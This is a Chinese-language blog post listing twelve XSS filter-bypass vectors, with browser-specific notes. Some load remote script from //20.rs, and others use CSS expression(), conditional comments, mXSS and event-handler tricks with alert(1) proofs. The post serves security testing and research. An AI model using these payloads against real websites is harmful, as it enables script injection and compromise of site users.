12个有趣的 XSS Vector

简介: XSS Vector #1 URL中第二个斜杠在Internet Explorer下(测试于IE11)可被U+3031,U+3033,U+3035,U+309D,U+30FC,U+30FD,U+FF70代替。

XSS Vector #1

<script src=/〱20.rs></script>

URL中第二个斜杠在Internet Explorer下(测试于IE11)可被U+3031,U+3033,U+3035,U+309D,U+30FC,U+30FD,U+FF70代替。在特定环境下可以帮助测试者绕过一些正则。

XSS Vector #2

<script src=//20.rs async>

这个Vector可以在不闭合script标签的情况下,在IE下(测试于IE11)正常调用远程的JavaScript。不但可以有效地绕过一些无聊的正则,还可以帮助你缩短你的payload。btw,这和后面会不会出现其它的script标签进而导致当前payload被闭合的一类现象无关。

XSS Vector #3

<div style="x: /**/ression(alert(1))('\')exp\')">

IE的一个CSS Parse BUG。在特定情况下可能可以帮助绕过一些XSS的防御正则。by @gainover

XSS Vector #4

<script>/*@cc_on alert(1) @*/</script>

当输出点在多行注视符号之间,切无法结束script标签时,可以借助该Vector在IE下(需要IE版本在10或以前)成功的XSS。

XSS Vector #5

<base href="javascript:\"><a href="//%0aalert(1);//“>Click Me</a>

该Vector在不久前由@irsdl发布。测试在Chrome下有效。

XSS Vector #6

<title>&lt;img src=1 onerror=alert(1)&gt;</title> div.innerHTML = document.getElementsByTagName("title")[0]; // IE8, already-known?

IE8下的又一枚mXSS,最近由@hasegawayosuke发布在了Twitter上。

XSS Vector #7

<picture><source srcset=1><img onerror=alert(1)>

最近由.mario发布在Twitter上。测试在Chrome canary下有效。

XSS Vector #8

<script>''+{valueOf:location, toString:[].join,0:'javascript:prompt%281%29’,length:1}</script>

这确实是炒冷饭。不过很少见人提到。该Vector同样只在IE下有效。优点就是不需要等号和圆括号。意味着在某些情况下可以帮你简单绕过一些不切实际的XSS Filter进而构造你有效的POC。

XSS Vector #9

<meta http-equiv="X-UA-Compatible" content="IE=9;"><% onclick=alert(1)>click me

该Vector仅在IE9有效。可以看到左尖括号后面紧跟着的并不是字母。但在IE9这依然会被认定为是一个有效的标签。就像我们对大部分的未知标签的理解,我们可以在那些莫名其妙的标签当中使用onclick和onmouse系列的event handler进行XSS跨站攻击。至于可以拿来干什么,仁者见仁吧。

XSS Vector #10

<script>alert`1`</script>

ES6新特性。可以使用backtick来代替圆括号。测试于Firefox Nightly.

XSS Vector #11

<input onresize=alert(1)>

这对于input标签来说应该是最短的Vector了。在IE10下有效。无需autofocus进行辅助和用户交互就可以自动触发。在autofocus被过滤,无法重写type的情况下算是个选项。除此之外对于使用autofocus的vector除了我们熟知的onblur,onfocus等还有几个event handler可以用来XSS。

<iframe src=被xss的页面.htm>

被xss的页面.htm

<input onActivate=alert(2) autofocus>
<input onBeforeActivate=alert(5) autofocus>

在IE10和IE11下有效。当然了,如果可以写入type=image 我们还可以使用onload,onerror这类的event handler。

XSS Vector #12

<iframe src=test.htm> <input type=hidden style=x:expression(alert(1))> 测试于IE6-9 by @Sogili
<form><input type=hidden onforminput=alert('what?')><input></form> 测试于Opera12
<svg><input type=hidden onload=alert(1)> //测试于safari7.0.6

有些是冷面,有些需要用户交互,有些你可能并不认为是bypass。仁者见仁吧。该Vector的重点在于type=hidden。

相关文章
|
6月前
|
JSON 安全 Go
30、xss发生的位置
30、xss发生的位置
66 1
|
存储 API C++
C++ std::vector元素的内存分配问题
在使用C++ STL的vector时,下面三种写法有什么不同呢?其内存分配是怎么样的呢? 首先,说结论吧(假设T是一个定义好的类): 对于std::vector<T> vec;这种方式vec在栈上(stack),而其中的元素T保存在堆上(heap); 对于std::vector<T>* vec = new std::vector<T>();这种方式vec和其中的元素T都保存在堆上; 对于std::vector<T*> vec;这种方式vec在栈上(stack),而其中的元素T保存在堆上(heap);和第一种情况类似。
183 0
|
Web App开发 JavaScript 前端开发
详探XSS PayIoad
1.Cookie劫持 一个最常见的XSS Payload,就是通过读取浏览器的Cookie对象,从而发起“Cookie劫持”攻击 Cookie中一般加密保存了当前用户的登录凭证。Cookie如果丢失,往往意味着用户的登录凭证丢失。换句话说,攻击者可以不通过密码,而直接登录进用户的账户
187 1
详探XSS PayIoad
XSS-Game level 6
第六关未过滤大小写 , 使用大小写绕过
106 0
XSS-Game level 6
XSS-Game level 7
第七关过滤了 script , 但未过滤尖括号 '<','>' , 使用双写绕过
127 0
XSS-Game level 7
XSS-Game level 5
第五关过滤了 <script> 和 on 事件 , 使用 a 标签绕过
122 0
XSS-Game level 5
XSS-Game level 10
第十关过滤了尖括号 > < , 并且隐藏了输入框 , 使用事件绕过,并使输入框取消隐藏
XSS-Game level 10
XSS-Game level 12
第十二关利用 HTTP_USER_AGENT 通过点击事件绕过
137 0
XSS-Game level 12
XSS-Game Level 4
第四关过滤了左右尖括号 ">","<" , 我们使用事件来绕过
131 0
XSS-Game Level 4
XSS-Game level 9
第九关过滤的很严 , 使用编码绕过
103 0
XSS-Game level 9